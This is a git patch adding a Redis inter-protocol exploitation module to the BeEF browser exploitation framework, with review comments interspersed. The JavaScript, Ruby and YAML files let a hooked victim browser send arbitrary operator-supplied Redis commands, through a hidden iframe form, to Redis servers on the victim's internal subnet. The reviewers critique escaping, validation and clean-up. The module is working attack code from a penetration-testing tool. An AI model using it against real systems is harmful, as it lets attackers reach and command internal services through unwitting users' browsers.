From 1f83c2a63fcb92a0a96c41daed333966b3c6f38c Mon Sep 17 00:00:00 2001
From: bcoles
Date: Wed, 8 Jan 2014 22:22:22 +1030
Subject: [PATCH] Add Redis IPEC module
---
modules/ipec/inter_protocol_redis/command.js | 46 +++++++++++++++++++
modules/ipec/inter_protocol_redis/config.yaml | 17 +++++++
modules/ipec/inter_protocol_redis/module.rb | 24 ++++++++++
3 files changed, 87 insertions(+)
create mode 100644 modules/ipec/inter_protocol_redis/command.js
create mode 100644 modules/ipec/inter_protocol_redis/config.yaml
create mode 100644 modules/ipec/inter_protocol_redis/module.rb
diff --git a/modules/ipec/inter_protocol_redis/command.js b/modules/ipec/inter_protocol_redis/command.js
new file mode 100644
index 000000000..a5b5e4c8c
--- /dev/null
+++ b/modules/ipec/inter_protocol_redis/command.js
@@ -0,0 +1,46 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ // validate payload
+ try {
+ var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target host
+ var rhost = "<%= @rhost %>";
+ if (!rhost) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+ return;
+ }
+
+ // validate target port
+ var rport = "<%= @rport %>";
+ if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+ return;
+ }
+
+ // validate timeout
+ var timeout = "<%= @timeout %>";
+ if (isNaN(timeout)) timeout = 30;
+
+ // send commands
+ var redis_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", cmd);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Redis commands sent');
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(redis_ipec_form_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout * 1000);
+
+});
+
diff --git a/modules/ipec/inter_protocol_redis/config.yaml b/modules/ipec/inter_protocol_redis/config.yaml
new file mode 100644
index 000000000..ecb616a13
--- /dev/null
+++ b/modules/ipec/inter_protocol_redis/config.yaml
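Review bot: The clean-up at the end of the hunk assigns `cleanup` without `var` and schedules it with a string, `setTimeout("cleanup()", timeout * 1000)`, so the function lands on the page's global object and is looked up by name when the timer fires. If the module runs twice in one page, the second run overwrites `cleanup`; the first run's iframe is then never removed and the second timer fails on a node that is already gone. Passing a closure keeps each run self-contained and avoids the string evaluation: `setTimeout(function() { document.body.removeChild(redis_ipec_form_<%= @command_id %>); }, timeout * 1000);`. Separately, the `try`/`catch` around `var cmd = '…'` cannot report a malformed payload, because a broken string literal is a parse error for the whole script and never reaches the `catch`.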
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ inter_protocol_redis:
+ enable: true
+ category: "IPEC"
+ name: "Redis"
+ description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the Redis commands are not returned to BeEF.

Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
+ unknown: ["S", "O"]
diff --git a/modules/ipec/inter_protocol_redis/module.rb b/modules/ipec/inter_protocol_redis/module.rb
new file mode 100644
index 000000000..b9fc596cd
--- /dev/null
+++ b/modules/ipec/inter_protocol_redis/module.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Inter_protocol_redis < BeEF::Core::Command
+
+ def self.options
+ cmd = 'set server:name "BeEF says:\\\\nm00!"\\nquit\\n'
+ return [
+ {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+ {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'6379'},
+ {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'15'},
+ {'name'=>'commands','ui_label'=>'Redis commands', 'description'=>"Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.", 'type'=>'textarea', 'value'=>cmd, 'width'=>'200px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result'] if not @datastore['result'].nil?
+ content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+ save content
+ end
+end
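Review bot: The `description` string misspells "separate" as `seperate`, and the same typo is repeated in the `commands` option description in module.rb. The description would also be more useful to someone assessing exposure if it named what stops the request: a Redis instance that requires authentication rejects the commands, and later Redis releases close the connection and log a security warning when the first line received is an HTTP `POST` or `Host:`. The `unknown: ["S", "O"]` entry suggests those browsers were not tested; a short comment saying so would keep the compatibility list from being read as verified.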
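Review bot: Nothing in `self.options` or elsewhere in this class checks `rhost`, `rport` or `timeout` before they are rendered into command.js, where each is placed inside a double-quoted JavaScript literal (`var rhost = "<%= @rhost %>";`). A value containing a double quote or a line break therefore breaks the generated script instead of producing one of the `fail=` messages, and the port range check runs only in the browser. Validating the three fields on the Ruby side before rendering, and escaping them the way `@commands` is escaped, would make a bad value visible to the operator. As a style point, `if not @datastore['result'].nil?` in `post_execute` reads more idiomatically as `unless @datastore['result'].nil?`.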